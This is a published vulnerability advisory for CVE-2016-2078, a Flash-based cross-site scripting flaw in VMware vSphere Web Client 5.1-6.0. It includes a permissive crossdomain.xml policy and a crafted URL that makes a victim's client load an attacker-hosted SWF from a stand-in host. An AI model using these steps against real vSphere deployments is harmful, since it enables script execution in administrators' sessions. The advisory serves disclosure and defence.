VMWare vSphere Web Client 6.0 Cross Site Scripting

`[+] Credits: John Page aka hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/VMWARE-VSPHERE-FLASH-XSS.txt  
  
[+] ISR: apparitionsec  
  
  
  
  
Vendor:  
===============  
www.vmware.com  
  
  
  
Product:  
====================================  
VMWare vSphere Web Client v5.1 - 6.0  
  
A server virtualization platform from VMware. Also referred to as a cloud  
operating system or virtualized data center platform, VMware vSphere enables  
IT departments to efficiently place application workloads on the most  
cost-effective compute resource available  
  
VMware vSphere includes the VMware ESX / ESXi hypervisor, a type 1  
hypervisor that functions as the virtualization server; the VMware vCenter  
Server,  
which manages vSphere environments; the VMware vSphere Client, which is  
used to install and manage virtual machines through the hypervisor; and  
VMware VMFS, the file system component from VMware.  
  
  
Vulnerability Type:  
====================  
Flash XSS  
  
  
  
CVE Reference:  
==============  
CVE-2016-2078  
  
  
  
Vulnerability Details:  
=====================  
  
VMWare vSphere Web Client is vulnerable to Flash based XSS through the  
loading of arbitrary .SWF files via 'flashvars' parameter. Flashvars is a  
Flash Player feature that allows passing of variables to the '_root' level  
of a Flash movie from the hosting webpage. Attackers can exploit this  
to call arbitrary Flash actionscript functions on the victims Flash Player  
client through attacker supplied SWF files that execute in the same  
security context as that of vSphere Web Client.  
  
  
e.g.  
  
  
flashvars:  
'locale=en_US&localeChain=en_US&resourceModuleURLs=locales/UI-en_US.swf&resourceModuleURLs=http%3A%2F%2Fattacker-site%2FEvil.swf',  
  
  
  
References:  
============  
VMSA-2016-0006  
  
http://www.vmware.com/security/advisories/VMSA-2016-0006.html  
  
  
  
Exploit code(s):  
===============  
  
  
1) Attacker server needs Flash policy file "crossdomain.xml" It grants  
Flash Player permission to talk to servers other than  
the one it's hosted on. This will allow victim server ability to talk to  
the evil server.  
  
e.g.  
  
<?xml version="1.0"?>  
<cross-domain-policy>  
<allow-access-from domain="*.vsphere-client.com" />  
<allow-access-from domain="*vsphere-client.com" />  
</cross-domain-policy>  
  
  
2) Send infected linx to the victim.  
  
https://victim:9443/vsphere-client/ui.jsp?resourceModuleURLs=http://attacker-site/Evil.swf  
  
  
  
Disclosure Timeline:  
=================================  
Vendor Notification: Jan 4, 2016  
May 25, 2016 : Public Disclosure  
  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
  
Severity Level:  
===============  
4.2 (Medium)  
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N  
  
  
  
Description:  
================================================  
Request Method(s): [+] GET  
  
  
Vulnerable Product: [+] VMWare 5.1 - 6.0 vsphere-client  
  
  
Vulnerable Parameter(s): [+] flashvars / resourceModuleURLs  
============================================================  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the  
information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author  
prohibits any malicious use of security related information  
or exploits by the author or elsewhere.  
  
hyp3rlinx  
`